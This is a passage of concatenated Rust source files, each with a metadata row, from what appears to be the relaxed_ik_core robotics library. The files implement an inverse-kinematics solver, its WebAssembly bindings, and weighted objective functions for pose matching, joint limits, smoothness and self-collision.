let tmp_q = UnitQuaternion::from_scaled_axis(axisangle);
let org_q = relaxed_ik.vars.goal_quats[i].clone();
relaxed_ik.vars.goal_quats[i] = tmp_q * org_q;
relaxed_ik.vars.tolerances[i] = Vector6::new( tolerance[3*i], tolerance[3*i+1], tolerance[3*i+2],
tolerance[3*i+3], tolerance[3*i+4], tolerance[3*i+5])
}
let x = relaxed_ik.solve();
let frames = relaxed_ik.vars.robot.get_frames_immutable(&x);
let last = frames[0].0.len() - 1 ;
let ee_pos = frames[0].0[last];
let goal = relaxed_ik.vars.goal_positions[0];
let dist = (ee_pos - goal).norm();
return x;
}
| rust | MIT | 1c48d2ae408b4e024ee037641aac1e728267984e | 2026-01-04T20:21:47.335665Z | false |
uwgraphics/relaxed_ik_core | https://github.com/uwgraphics/relaxed_ik_core/blob/1c48d2ae408b4e024ee037641aac1e728267984e/src/lib.rs | src/lib.rs | pub mod utils_rust;
pub mod spacetime;
pub mod groove;
pub mod relaxed_ik;
pub mod relaxed_ik_wrapper;
pub mod relaxed_ik_web; | rust | MIT | 1c48d2ae408b4e024ee037641aac1e728267984e | 2026-01-04T20:21:47.335665Z | false |
uwgraphics/relaxed_ik_core | https://github.com/uwgraphics/relaxed_ik_core/blob/1c48d2ae408b4e024ee037641aac1e728267984e/src/relaxed_ik.rs | src/relaxed_ik.rs | use crate::groove::vars::RelaxedIKVars;
use crate::groove::groove::{OptimizationEngineOpen};
use crate::groove::objective_master::ObjectiveMaster;
use crate::utils_rust::file_utils::{*};
use crate::utils_rust::transformations::{*};
use nalgebra::{Vector3, UnitQuaternion, Quaternion};
use std::os::raw::{c_double, c_int};
#[repr(C)]
pub struct Opt {
pub data: *const c_double,
pub length: c_int,
}
pub struct RelaxedIK {
pub vars: RelaxedIKVars,
pub om: ObjectiveMaster,
pub groove: OptimizationEngineOpen
}
impl RelaxedIK {
pub fn load_settings( path_to_setting: &str) -> Self {
println!("RelaxedIK is using below setting file {}", path_to_setting);
let vars = RelaxedIKVars::from_local_settings(path_to_setting);
let om = ObjectiveMaster::relaxed_ik(&vars.robot.chain_lengths);
let groove = OptimizationEngineOpen::new(vars.robot.num_dofs.clone());
Self{vars, om, groove}
}
pub fn reset(&mut self, x: Vec<f64>) {
self.vars.reset( x.clone());
}
pub fn solve(&mut self) -> Vec<f64> {
let mut out_x = self.vars.xopt.clone();
self.groove.optimize(&mut out_x, &self.vars, &self.om, 100);
let frames = self.vars.robot.get_frames_immutable(&out_x);
for i in 0..out_x.len() {
if (out_x[i].is_nan()) {
println!("No valid solution found! Returning previous solution: {:?}. End effector position goals: {:?}", self.vars.xopt, self.vars.goal_positions);
return self.vars.xopt.clone();
}
}
self.vars.update(out_x.clone());
out_x
}
}
| rust | MIT | 1c48d2ae408b4e024ee037641aac1e728267984e | 2026-01-04T20:21:47.335665Z | false |
uwgraphics/relaxed_ik_core | https://github.com/uwgraphics/relaxed_ik_core/blob/1c48d2ae408b4e024ee037641aac1e728267984e/src/relaxed_ik_web.rs | src/relaxed_ik_web.rs |
use crate::groove::vars::{RelaxedIKVars, VarsConstructorData};
use crate::groove::groove::{OptimizationEngineOpen};
use crate::groove::objective_master::ObjectiveMaster;
use crate::utils_rust::transformations::{*};
use wasm_bindgen::prelude::*;
use js_sys::Array;
extern crate serde_json;
use web_sys;
extern crate console_error_panic_hook;
use nalgebra::{UnitQuaternion, Vector3, Vector6, Quaternion, Point3};
#[wasm_bindgen]
pub struct RelaxedIK {
pub(crate) vars: RelaxedIKVars,
pub(crate) om: ObjectiveMaster,
pub(crate) groove: OptimizationEngineOpen
}
#[wasm_bindgen]
impl RelaxedIK {
#[wasm_bindgen(constructor)]
pub fn new( configs: JsValue, urdf: String) -> Self {
console_error_panic_hook::set_once();
let cfg: VarsConstructorData = serde_wasm_bindgen::from_value(configs).unwrap();
let vars = RelaxedIKVars::from_jsvalue(cfg, &urdf);
let om = ObjectiveMaster::relaxed_ik(&vars.robot.chain_lengths);
let groove = OptimizationEngineOpen::new(vars.robot.num_dofs.clone());
Self{vars, om, groove}
}
pub fn reset(&mut self, init_state: JsValue) {
let starting_config = if init_state.is_null() || init_state.is_undefined() {
self.vars.init_state.clone()
} else {
let tmp: Vec<f64> = serde_wasm_bindgen::from_value(init_state).unwrap();
if tmp.len() != self.vars.robot.num_dofs {
self.vars.init_state.clone()
} else {
tmp
}
};
self.vars.reset( starting_config.clone());
}
pub fn solve_position(&mut self, pos_goal: JsValue, quat_goal: JsValue, tolerance: JsValue) -> Array{
self.solve_position_helper(pos_goal, quat_goal, tolerance, false)
}
pub fn solve_position_relative(&mut self, pos_goal: JsValue, quat_goal: JsValue, tolerance: JsValue) -> Array{
self.solve_position_helper(pos_goal, quat_goal, tolerance, true)
}
pub fn solve(&mut self, pos_goal: JsValue, quat_goal: JsValue) -> Array{
self.solve_position_relative(pos_goal, quat_goal, JsValue::undefined())
}
}
impl RelaxedIK {
pub fn solve_position_helper(&mut self, pos_goal: JsValue, quat_goal: JsValue, tolerance: JsValue, relative: bool) -> Array{
let pos_vec: Vec<f64> = serde_wasm_bindgen::from_value(pos_goal).unwrap();
let quat_vec: Vec<f64> = serde_wasm_bindgen::from_value(quat_goal).unwrap();
let mut tole_vec = if tolerance.is_null() || tolerance.is_undefined() {
vec![0.0; self.vars.robot.num_chains * 6]
} else {
serde_wasm_bindgen::from_value(tolerance).unwrap()
};
let mut pos_goals: Vec<Vector3<f64>> = Vec::new();
let mut quat_goals: Vec<UnitQuaternion<f64>> = Vec::new();
let mut tolerances: Vec<Vector6<f64>> = Vec::new();
for i in 0..self.vars.robot.num_chains {
let pos = Vector3::new(pos_vec[i*3], pos_vec[i*3+1], pos_vec[i*3+2]);
let quat = UnitQuaternion::from_quaternion(Quaternion::new(quat_vec[i*4], quat_vec[i*4+1], quat_vec[i*4+2], quat_vec[i*4+3]));
let tole = Vector6::new(tole_vec[i*6], tole_vec[i*6+1], tole_vec[i*6+2], tole_vec[i*6+3], tole_vec[i*6+4], tole_vec[i*6+5]);
pos_goals.push(pos);
quat_goals.push(quat);
tolerances.push(tole);
}
let mut out_x = self.vars.xopt.clone();
for i in 0..self.vars.robot.num_chains {
if relative {
self.vars.goal_positions[i] = self.vars.init_ee_positions[i] + pos_goals[i];
self.vars.goal_quats[i] = quat_goals[i] * self.vars.init_ee_quats[i];
} else {
self.vars.goal_positions[i] = pos_goals[i].clone();
self.vars.goal_quats[i] = quat_goals[i].clone();
}
self.vars.tolerances[i] = tolerances[i].clone();
}
self.groove.optimize(&mut out_x, &self.vars, &self.om, 100);
self.vars.update(out_x.clone());
out_x.into_iter().map(JsValue::from).collect()
}
} | rust | MIT | 1c48d2ae408b4e024ee037641aac1e728267984e | 2026-01-04T20:21:47.335665Z | false |
uwgraphics/relaxed_ik_core | https://github.com/uwgraphics/relaxed_ik_core/blob/1c48d2ae408b4e024ee037641aac1e728267984e/src/groove/objective.rs | src/groove/objective.rs | use crate::groove::{vars};
use crate::utils_rust::transformations::{*};
use nalgebra::geometry::{Translation3, UnitQuaternion, Quaternion};
use std::cmp;
use crate::groove::vars::RelaxedIKVars;
use nalgebra::{Vector3, Isometry3, Point3};
use std::ops::Deref;
use time::PreciseTime;
use parry3d_f64::{shape, query};
pub fn groove_loss(x_val: f64, t: f64, d: i32, c: f64, f: f64, g: i32) -> f64 {
-( (-(x_val - t).powi(d)) / (2.0 * c.powi(2) ) ).exp() + f * (x_val - t).powi(g)
}
pub fn groove_loss_derivative(x_val: f64, t: f64, d: i32, c: f64, f: f64, g: i32) -> f64 {
-( (-(x_val - t).powi(d)) / (2.0 * c.powi(2) ) ).exp() * ((-d as f64 * (x_val - t)) / (2.0 * c.powi(2))) + g as f64 * f * (x_val - t).powi(g - 1)
}
pub fn swamp_groove_loss(x_val: f64, g:f64, l_bound: f64, u_bound: f64, c : f64, f1: f64, f2: f64, f3:f64, p1:i32) -> f64 {
let x = (2.0 * x_val - l_bound - u_bound) / (u_bound - l_bound);
let b = (-1.0 / (0.05 as f64).ln()).powf(1.0 / p1 as f64);
- f1 * ( (-(x_val-g).powi(2)) / (2.0 * c.powi(2)) ).exp()
+ f2 * (x_val-g).powi(2)
+ f3 * (1.0 - (-(x/b).powi(p1)).exp())
}
pub fn swamp_loss(x_val: f64, l_bound: f64, u_bound: f64, f1: f64, f2: f64, p1:i32) -> f64 {
let x = (2.0 * x_val - l_bound - u_bound) / (u_bound - l_bound);
let b = (-1.0 / (0.05 as f64).ln()).powf(1.0 / p1 as f64);
(f1 + f2 * x.powi(2)) * (1.0 - (- (x/b).powi(p1)).exp()) - 1.0
}
pub fn swamp_groove_loss_derivative(x_val: f64, g:f64, l_bound: f64, u_bound: f64, c : f64, f1: f64, f2: f64, f3:f64, p1:i32) -> f64 {
if (2.0 * x_val - l_bound - u_bound).abs() < 1e-8 {
return 0.0;
}
let x = (2.0 * x_val - l_bound - u_bound) / (u_bound - l_bound);
let b = (-1.0 / (0.05 as f64).ln()).powf(1.0 / p1 as f64);
- f1 * ( (-x_val.powi(2)) / (2.0 * c.powi(2) ) ).exp() * ((-2.0 * x_val) / (2.0 * c.powi(2)))
+ 2.0 * f2 * x_val
+ f3 / (2.0 * x_val - l_bound - u_bound) * ( 2.0 * (x/b).powi(p1) * p1 as f64 * (- (x/b).powi(p1)).exp())
}
pub trait ObjectiveTrait {
fn call(&self, x: &[f64], v: &vars::RelaxedIKVars, frames: &Vec<(Vec<nalgebra::Vector3<f64>>, Vec<nalgebra::UnitQuaternion<f64>>)>) -> f64;
fn call_lite(&self, x: &[f64], v: &vars::RelaxedIKVars, ee_poses: &Vec<(nalgebra::Vector3<f64>, nalgebra::UnitQuaternion<f64>)>) -> f64;
fn gradient(&self, x: &[f64], v: &vars::RelaxedIKVars, frames: &Vec<(Vec<nalgebra::Vector3<f64>>, Vec<nalgebra::UnitQuaternion<f64>>)>) -> (f64, Vec<f64>) {
let mut grad: Vec<f64> = Vec::new();
let f_0 = self.call(x, v, frames);
for i in 0..x.len() {
let mut x_h = x.to_vec();
x_h[i] += 0.000000001;
let frames_h = v.robot.get_frames_immutable(x_h.as_slice());
let f_h = self.call(x_h.as_slice(), v, &frames_h);
grad.push( (-f_0 + f_h) / 0.000000001);
}
(f_0, grad)
}
fn gradient_lite(&self, x: &[f64], v: &vars::RelaxedIKVars, ee_poses: &Vec<(nalgebra::Vector3<f64>, nalgebra::UnitQuaternion<f64>)>) -> (f64, Vec<f64>) {
let mut grad: Vec<f64> = Vec::new();
let f_0 = self.call_lite(x, v, ee_poses);
for i in 0..x.len() {
let mut x_h = x.to_vec();
x_h[i] += 0.0000001;
let ee_poses_h = v.robot.get_ee_pos_and_quat_immutable(x_h.as_slice());
let f_h = self.call_lite(x_h.as_slice(), v, &ee_poses_h);
grad.push( (-f_0 + f_h) / 0.0000001);
}
(f_0, grad)
}
fn gradient_type(&self) -> usize {return 1} // manual diff = 0, finite diff = 1
}
pub struct MatchEEPosiDoF {
pub arm_idx: usize,
pub axis: usize
}
impl MatchEEPosiDoF {
pub fn new(arm_idx: usize, axis: usize) -> Self {Self{arm_idx, axis}}
}
impl ObjectiveTrait for MatchEEPosiDoF {
fn call(&self, x: &[f64], v: &vars::RelaxedIKVars, frames: &Vec<(Vec<nalgebra::Vector3<f64>>, Vec<nalgebra::UnitQuaternion<f64>>)>) -> f64 {
let last_elem = frames[self.arm_idx].0.len() - 1;
let goal_quat = v.goal_quats[self.arm_idx];
// E_{gc} = R_{gw} * T_{gw} * T_{wc} * R_{wc}, R_{wc} won't matter since we are only interested in the translation
// so we get: T_{gc} = R_{gw} * T_{gw} * T_{wc}
let T_gw_T_wc = nalgebra::Vector3::new( frames[self.arm_idx].0[last_elem].x - v.goal_positions[self.arm_idx].x,
frames[self.arm_idx].0[last_elem].y - v.goal_positions[self.arm_idx].y,
frames[self.arm_idx].0[last_elem].z - v.goal_positions[self.arm_idx].z );
let T_gc = goal_quat.inverse() * T_gw_T_wc;
let dist: f64 = T_gc[self.axis];
let bound = v.tolerances[self.arm_idx][self.axis];
if (bound <= 1e-2) {
groove_loss(dist, 0., 2, 0.1, 10.0, 2)
} else {
swamp_groove_loss(dist, 0.0, -bound, bound, bound*2.0, 1.0, 0.01, 100.0, 20)
}
}
fn call_lite(&self, x: &[f64], v: &vars::RelaxedIKVars, ee_poses: &Vec<(nalgebra::Vector3<f64>, nalgebra::UnitQuaternion<f64>)>) -> f64 {
let x_val = ( ee_poses[self.arm_idx].0 - v.goal_positions[self.arm_idx] ).norm();
groove_loss(x_val, 0., 2, 0.1, 10.0, 2)
}
}
pub struct MatchEERotaDoF {
pub arm_idx: usize,
pub axis: usize
}
impl MatchEERotaDoF {
pub fn new(arm_idx: usize, axis: usize) -> Self {Self{arm_idx, axis}}
}
impl ObjectiveTrait for MatchEERotaDoF {
fn call(&self, x: &[f64], v: &vars::RelaxedIKVars, frames: &Vec<(Vec<nalgebra::Vector3<f64>>, Vec<nalgebra::UnitQuaternion<f64>>)>) -> f64 {
let last_elem = frames[self.arm_idx].1.len() - 1;
let ee_quat = frames[self.arm_idx].1[last_elem];
let goal_quat = v.goal_quats[self.arm_idx];
let rotation = goal_quat.inverse()*ee_quat;
let euler = rotation.euler_angles();
let scaled_axis = rotation.scaled_axis();
// println!("axisAngle: {:?} {:?}", euler, axisAngle);
let mut angle: f64 = 0.0;
angle += scaled_axis[self.axis].abs();
let bound = v.tolerances[self.arm_idx][self.axis + 3];
if (bound <= 1e-2) {
groove_loss(angle, 0., 2, 0.1, 10.0, 2)
} else {
if bound >= 3.14159260 {
swamp_loss(angle, -bound, bound, 100.0, 0.1, 20)
} else {
swamp_groove_loss(angle, 0.0, -bound, bound, bound*2.0, 1.0, 0.01, 100.0, 20)
// swamp_groove_loss(angle, 0.0, -bound, bound, 10.0, 1.0, 0.01, 100.0, 20)
}
}
}
fn call_lite(&self, x: &[f64], v: &vars::RelaxedIKVars, ee_poses: &Vec<(nalgebra::Vector3<f64>, nalgebra::UnitQuaternion<f64>)>) -> f64 {
let x_val = ( ee_poses[self.arm_idx].0 - v.goal_positions[self.arm_idx] ).norm();
groove_loss(x_val, 0., 2, 0.1, 10.0, 2)
}
}
pub struct SelfCollision {
pub arm_idx: usize,
pub first_link: usize,
pub second_link: usize
}
impl SelfCollision {
pub fn new(arm_idx: usize, first_link: usize, second_link: usize) -> Self {Self{arm_idx, first_link, second_link}}
}
impl ObjectiveTrait for SelfCollision {
fn call(&self, x: &[f64], v: &vars::RelaxedIKVars, frames: &Vec<(Vec<nalgebra::Vector3<f64>>, Vec<nalgebra::UnitQuaternion<f64>>)>) -> f64 {
for i in 0..x.len() {
if (x[i].is_nan()) {
return 10.0
}
}
let mut x_val: f64 = 0.0;
let link_radius = 0.05;
let start_pt_1 = Point3::from(frames[self.arm_idx].0[self.first_link]);
let end_pt_1 = Point3::from(frames[self.arm_idx].0[self.first_link+1]);
let segment_1 = shape::Segment::new(start_pt_1, end_pt_1);
let mut start_pt_2 = Point3::from(frames[self.arm_idx].0[self.second_link]);
let mut end_pt_2 = Point3::from(frames[self.arm_idx].0[self.second_link+1]);
let segment_2 = shape::Segment::new(start_pt_2, end_pt_2);
let segment_pos = nalgebra::one();
// println!("start_pt_1:{} end_pt_1:{} start_pt_2:{} end_pt_2:{} x: {:?}", start_pt_1, end_pt_1, start_pt_2, end_pt_2, x);
let dis = query::distance(&segment_pos, &segment_1, &segment_pos, &segment_2).unwrap() - 0.05;
swamp_loss(dis, 0.02, 1.5, 60.0, 0.0001, 30)
}
fn call_lite(&self, x: &[f64], v: &vars::RelaxedIKVars, ee_poses: &Vec<(nalgebra::Vector3<f64>, nalgebra::UnitQuaternion<f64>)>) -> f64 {
let x_val = 1.0; // placeholder
groove_loss(x_val, 0., 2, 2.1, 0.0002, 4)
}
}
// pub struct EnvCollision {
// pub arm_idx: usize
// }
// impl EnvCollision {
// pub fn new(arm_idx: usize) -> Self {Self{arm_idx}}
// }
// impl ObjectiveTrait for EnvCollision {
// fn call(&self, x: &[f64], v: &vars::RelaxedIKVars, frames: &Vec<(Vec<nalgebra::Vector3<f64>>, Vec<nalgebra::UnitQuaternion<f64>>)>) -> f64 {
// // let start = PreciseTime::now();\
// for i in 0..x.len() {
// if (x[i].is_nan()) {
// return 10.0
// }
// }
// let mut x_val: f64 = 0.0;
// let link_radius = v.env_collision.link_radius;
// let penalty_cutoff: f64 = link_radius * 2.0;
// let a = penalty_cutoff.powi(2);
// for (option, score) in &v.env_collision.active_obstacles[self.arm_idx] {
// if let Some(handle) = option {
// let mut sum: f64 = 0.0;
// let obstacle = v.env_collision.world.objects.get(*handle).unwrap();
// let last_elem = frames[self.arm_idx].0.len() - 1;
// for i in 0..last_elem {
// let mut start_pt = Point3::from(frames[self.arm_idx].0[i]);
// // hard coded for ur5
// if (i == last_elem - 1) {
// start_pt = Point3::from(frames[self.arm_idx].0[i] + 0.2 * (frames[self.arm_idx].0[i] - frames[self.arm_idx].0[i + 1]));
// }
// let end_pt = Point3::from(frames[self.arm_idx].0[i + 1]);
// let segment = shape::Segment::new(start_pt, end_pt);
// let segment_pos = nalgebra::one();
// let dis = query::distance(obstacle.position(), obstacle.shape().deref(), &segment_pos, &segment) - link_radius;
// // println!("Obstacle: {}, Link: {}, Distance: {:?}", obstacle.data().name, i, dis);
// sum += a / (dis + link_radius).powi(2);
// }
// // println!("OBJECTIVE -> {:?}, Sum: {:?}", obstacle.data().name, sum);
// x_val += sum;
// }
// }
// // let end = PreciseTime::now();
// // println!("Obstacles calculating takes {}", start.to(end));
// groove_loss(x_val, 0., 2, 3.5, 0.00005, 4)
// }
// fn call_lite(&self, x: &[f64], v: &vars::RelaxedIKVars, ee_poses: &Vec<(nalgebra::Vector3<f64>, nalgebra::UnitQuaternion<f64>)>) -> f64 {
// let x_val = 1.0; // placeholder
// groove_loss(x_val, 0., 2, 2.1, 0.0002, 4)
// }
// }
pub struct MaximizeManipulability;
impl ObjectiveTrait for MaximizeManipulability {
fn call(&self, x: &[f64], v: &vars::RelaxedIKVars, frames: &Vec<(Vec<nalgebra::Vector3<f64>>, Vec<nalgebra::UnitQuaternion<f64>>)>) -> f64 {
let x_val = v.robot.get_manipulability_immutable(&x);
groove_loss(x_val, 1.0, 2, 0.5, 0.1, 2)
}
fn call_lite(&self, x: &[f64], v: &vars::RelaxedIKVars, ee_poses: &Vec<(nalgebra::Vector3<f64>, nalgebra::UnitQuaternion<f64>)>) -> f64 {
0.0
}
}
pub struct EachJointLimits{
pub joint_idx: usize
}
impl EachJointLimits {
pub fn new(joint_idx: usize) -> Self {Self{joint_idx}}
}
impl ObjectiveTrait for EachJointLimits {
fn call(&self, x: &[f64], v: &vars::RelaxedIKVars, frames: &Vec<(Vec<nalgebra::Vector3<f64>>, Vec<nalgebra::UnitQuaternion<f64>>)>) -> f64 {
if v.robot.lower_joint_limits[self.joint_idx] == -999.0 && v.robot.upper_joint_limits[self.joint_idx] == 999.0 {
return -1.0;
}
let l = v.robot.lower_joint_limits[self.joint_idx];
let u = v.robot.upper_joint_limits[self.joint_idx];
swamp_loss(x[self.joint_idx], l, u, 10.0, 10.0, 20)
}
fn call_lite(&self, x: &[f64], v: &vars::RelaxedIKVars, ee_poses: &Vec<(nalgebra::Vector3<f64>, nalgebra::UnitQuaternion<f64>)>) -> f64 {
0.0
}
}
pub struct MinimizeVelocity;
impl ObjectiveTrait for MinimizeVelocity {
fn call(&self, x: &[f64], v: &vars::RelaxedIKVars, frames: &Vec<(Vec<nalgebra::Vector3<f64>>, Vec<nalgebra::UnitQuaternion<f64>>)>) -> f64 {
let mut x_val = 0.0;
for i in 0..x.len() {
x_val += (x[i] - v.xopt[i]).powi(2);
}
x_val = x_val.sqrt();
groove_loss(x_val, 0.0, 2, 0.1, 10.0, 2)
}
fn call_lite(&self, x: &[f64], v: &vars::RelaxedIKVars, ee_poses: &Vec<(nalgebra::Vector3<f64>, nalgebra::UnitQuaternion<f64>)>) -> f64 {
let mut x_val = 0.0;
for i in 0..x.len() {
x_val += (x[i] - v.xopt[i]).powi(2);
}
x_val = x_val.sqrt();
groove_loss(x_val, 0.0, 2, 0.1, 10.0, 2)
}
}
pub struct MinimizeAcceleration;
impl ObjectiveTrait for MinimizeAcceleration {
fn call(&self, x: &[f64], v: &vars::RelaxedIKVars, frames: &Vec<(Vec<nalgebra::Vector3<f64>>, Vec<nalgebra::UnitQuaternion<f64>>)>) -> f64 {
let mut x_val = 0.0;
for i in 0..x.len() {
let v1 = x[i] - v.xopt[i];
let v2 = v.xopt[i] - v.prev_state[i];
x_val += (v1 - v2).powi(2);
}
x_val = x_val.sqrt();
groove_loss(x_val, 0.0, 2, 0.1, 10.0, 2)
}
fn call_lite(&self, x: &[f64], v: &vars::RelaxedIKVars, ee_poses: &Vec<(nalgebra::Vector3<f64>, nalgebra::UnitQuaternion<f64>)>) -> f64 {
let mut x_val = 0.0;
for i in 0..x.len() {
let v1 = x[i] - v.xopt[i];
let v2 = v.xopt[i] - v.prev_state[i];
x_val += (v1 - v2).powi(2);
}
x_val = x_val.sqrt();
groove_loss(x_val, 0.0, 2, 0.1, 10.0, 2)
}
}
pub struct MinimizeJerk;
impl ObjectiveTrait for MinimizeJerk {
fn call(&self, x: &[f64], v: &vars::RelaxedIKVars, frames: &Vec<(Vec<nalgebra::Vector3<f64>>, Vec<nalgebra::UnitQuaternion<f64>>)>) -> f64 {
let mut x_val = 0.0;
for i in 0..x.len() {
let v1 = x[i] - v.xopt[i];
let v2 = v.xopt[i] - v.prev_state[i];
let v3 = v.prev_state[i] - v.prev_state2[i];
let a1 = v1 - v2;
let a2 = v2 - v3;
x_val += (a1 - a2).powi(2);
}
x_val = x_val.sqrt();
groove_loss(x_val, 0.0, 2, 0.1 , 10.0, 2)
}
fn call_lite(&self, x: &[f64], v: &vars::RelaxedIKVars, ee_poses: &Vec<(nalgebra::Vector3<f64>, nalgebra::UnitQuaternion<f64>)>) -> f64 {
let mut x_val = 0.0;
for i in 0..x.len() {
let v1 = x[i] - v.xopt[i];
let v2 = v.xopt[i] - v.prev_state[i];
let v3 = v.prev_state[i] - v.prev_state2[i];
let a1 = v1 - v2;
let a2 = v2 - v3;
x_val += (a1 - a2).powi(2);
}
x_val = x_val.sqrt();
groove_loss(x_val, 0.0, 2, 0.1, 10.0, 2)
}
}
pub struct MatchEEPosGoals {
pub arm_idx: usize
}
impl MatchEEPosGoals {
pub fn new(arm_idx: usize) -> Self {Self{arm_idx}}
}
impl ObjectiveTrait for MatchEEPosGoals {
fn call(&self, x: &[f64], v: &vars::RelaxedIKVars, frames: &Vec<(Vec<nalgebra::Vector3<f64>>, Vec<nalgebra::UnitQuaternion<f64>>)>) -> f64 {
let last_elem = frames[self.arm_idx].0.len() - 1;
let x_val = ( frames[self.arm_idx].0[last_elem] - v.goal_positions[self.arm_idx] ).norm();
groove_loss(x_val, 0., 2, 0.1, 10.0, 2)
}
fn call_lite(&self, x: &[f64], v: &vars::RelaxedIKVars, ee_poses: &Vec<(nalgebra::Vector3<f64>, nalgebra::UnitQuaternion<f64>)>) -> f64 {
let x_val = ( ee_poses[self.arm_idx].0 - v.goal_positions[self.arm_idx] ).norm();
groove_loss(x_val, 0., 2, 0.1, 10.0, 2)
}
}
pub struct MatchEEQuatGoals {
pub arm_idx: usize
}
impl MatchEEQuatGoals {
pub fn new(arm_idx: usize) -> Self {Self{arm_idx}}
}
impl ObjectiveTrait for MatchEEQuatGoals {
fn call(&self, x: &[f64], v: &vars::RelaxedIKVars, frames: &Vec<(Vec<nalgebra::Vector3<f64>>, Vec<nalgebra::UnitQuaternion<f64>>)>) -> f64 {
let last_elem = frames[self.arm_idx].1.len() - 1;
let tmp = Quaternion::new(-frames[self.arm_idx].1[last_elem].w, -frames[self.arm_idx].1[last_elem].i, -frames[self.arm_idx].1[last_elem].j, -frames[self.arm_idx].1[last_elem].k);
let ee_quat2 = UnitQuaternion::from_quaternion(tmp);
let disp = angle_between_quaternion(v.goal_quats[self.arm_idx], frames[self.arm_idx].1[last_elem]);
let disp2 = angle_between_quaternion(v.goal_quats[self.arm_idx], ee_quat2);
let x_val = disp.min(disp2);
groove_loss(x_val, 0., 2, 0.1, 10.0, 2)
}
fn call_lite(&self, x: &[f64], v: &vars::RelaxedIKVars, ee_poses: &Vec<(nalgebra::Vector3<f64>, nalgebra::UnitQuaternion<f64>)>) -> f64 {
let tmp = Quaternion::new(-ee_poses[self.arm_idx].1.w, -ee_poses[self.arm_idx].1.i, -ee_poses[self.arm_idx].1.j, -ee_poses[self.arm_idx].1.k);
let ee_quat2 = UnitQuaternion::from_quaternion(tmp);
let disp = angle_between_quaternion(v.goal_quats[self.arm_idx], ee_poses[self.arm_idx].1);
let disp2 = angle_between_quaternion(v.goal_quats[self.arm_idx], ee_quat2);
let x_val = disp.min(disp2);
groove_loss(x_val, 0., 2, 0.1, 10.0, 2)
}
}
| rust | MIT | 1c48d2ae408b4e024ee037641aac1e728267984e | 2026-01-04T20:21:47.335665Z | false |
uwgraphics/relaxed_ik_core | https://github.com/uwgraphics/relaxed_ik_core/blob/1c48d2ae408b4e024ee037641aac1e728267984e/src/groove/objective_master.rs | src/groove/objective_master.rs | use crate::groove::objective::*;
use crate::groove::vars::RelaxedIKVars;
pub struct ObjectiveMaster {
pub objectives: Vec<Box<dyn ObjectiveTrait + Send>>,
pub num_chains: usize,
pub weight_priors: Vec<f64>,
pub lite: bool,
pub finite_diff_grad: bool
}
impl ObjectiveMaster {
pub fn standard_ik(num_chains: usize) -> Self {
let mut objectives: Vec<Box<dyn ObjectiveTrait + Send>> = Vec::new();
let mut weight_priors: Vec<f64> = Vec::new();
for i in 0..num_chains {
objectives.push(Box::new(MatchEEPosGoals::new(i)));
weight_priors.push(1.0);
objectives.push(Box::new(MatchEEQuatGoals::new(i)));
weight_priors.push(1.0);
}
Self{objectives, num_chains, weight_priors, lite: true, finite_diff_grad: true}
}
pub fn relaxed_ik(chain_lengths: &[usize]) -> Self {
let mut objectives: Vec<Box<dyn ObjectiveTrait + Send>> = Vec::new();
let mut weight_priors: Vec<f64> = Vec::new();
let num_chains = chain_lengths.len();
let mut num_dofs = 0;
for i in 0..num_chains {
objectives.push(Box::new(MatchEEPosiDoF::new(i, 0)));
weight_priors.push(50.0);
objectives.push(Box::new(MatchEEPosiDoF::new(i, 1)));
weight_priors.push(50.0);
objectives.push(Box::new(MatchEEPosiDoF::new(i, 2)));
weight_priors.push(50.0);
objectives.push(Box::new(MatchEERotaDoF::new(i, 0)));
weight_priors.push(10.0);
objectives.push(Box::new(MatchEERotaDoF::new(i, 1)));
weight_priors.push(10.0);
objectives.push(Box::new(MatchEERotaDoF::new(i, 2)));
weight_priors.push(10.0);
// objectives.push(Box::new(EnvCollision::new(i)));
// weight_priors.push(1.0);
num_dofs += chain_lengths[i];
}
for j in 0..num_dofs {
objectives.push(Box::new(EachJointLimits::new(j))); weight_priors.push(0.1 );
}
objectives.push(Box::new(MinimizeVelocity)); weight_priors.push(0.7);
objectives.push(Box::new(MinimizeAcceleration)); weight_priors.push(0.5);
objectives.push(Box::new(MinimizeJerk)); weight_priors.push(0.3);
objectives.push(Box::new(MaximizeManipulability)); weight_priors.push(1.0);
for i in 0..num_chains {
for j in 0..chain_lengths[i]-2 {
for k in j+2..chain_lengths[i] {
objectives.push(Box::new(SelfCollision::new(0, j, k))); weight_priors.push(0.01 );
}
}
}
Self{objectives, num_chains, weight_priors, lite: false, finite_diff_grad: false}
}
pub fn call(&self, x: &[f64], vars: &RelaxedIKVars) -> f64 {
if self.lite {
self.__call_lite(x, vars)
} else {
self.__call(x, vars)
}
}
pub fn gradient(&self, x: &[f64], vars: &RelaxedIKVars) -> (f64, Vec<f64>) {
if self.lite {
if self.finite_diff_grad {
self.__gradient_finite_diff_lite(x, vars)
} else {
self.__gradient_lite(x, vars)
}
} else {
if self.finite_diff_grad {
self.__gradient_finite_diff(x, vars)
} else {
self.__gradient(x, vars)
}
}
}
pub fn gradient_finite_diff(&self, x: &[f64], vars: &RelaxedIKVars) -> (f64, Vec<f64>) {
if self.lite {
self.__gradient_finite_diff_lite(x, vars)
} else {
self.__gradient_finite_diff(x, vars)
}
}
fn __call(&self, x: &[f64], vars: &RelaxedIKVars) -> f64 {
let mut out = 0.0;
let frames = vars.robot.get_frames_immutable(x);
for i in 0..self.objectives.len() {
out += self.weight_priors[i] * self.objectives[i].call(x, vars, &frames);
}
out
}
fn __call_lite(&self, x: &[f64], vars: &RelaxedIKVars) -> f64 {
let mut out = 0.0;
let poses = vars.robot.get_ee_pos_and_quat_immutable(x);
for i in 0..self.objectives.len() {
out += self.weight_priors[i] * self.objectives[i].call_lite(x, vars, &poses);
}
out
}
fn __gradient(&self, x: &[f64], vars: &RelaxedIKVars) -> (f64, Vec<f64>) {
let mut grad: Vec<f64> = vec![0. ; x.len()];
let mut obj = 0.0;
let mut finite_diff_list: Vec<usize> = Vec::new();
let mut f_0s: Vec<f64> = Vec::new();
let frames_0 = vars.robot.get_frames_immutable(x);
for i in 0..self.objectives.len() {
if self.objectives[i].gradient_type() == 0 {
let (local_obj, local_grad) = self.objectives[i].gradient(x, vars, &frames_0);
f_0s.push(local_obj);
obj += self.weight_priors[i] * local_obj;
for j in 0..local_grad.len() {
grad[j] += self.weight_priors[i] * local_grad[j];
}
} else if self.objectives[i].gradient_type() == 1 {
finite_diff_list.push(i);
let local_obj = self.objectives[i].call(x, vars, &frames_0);
obj += self.weight_priors[i] * local_obj;
f_0s.push(local_obj);
}
}
if finite_diff_list.len() > 0 {
for i in 0..x.len() {
let mut x_h = x.to_vec();
x_h[i] += 0.0000001;
let frames_h = vars.robot.get_frames_immutable(x_h.as_slice());
for j in &finite_diff_list {
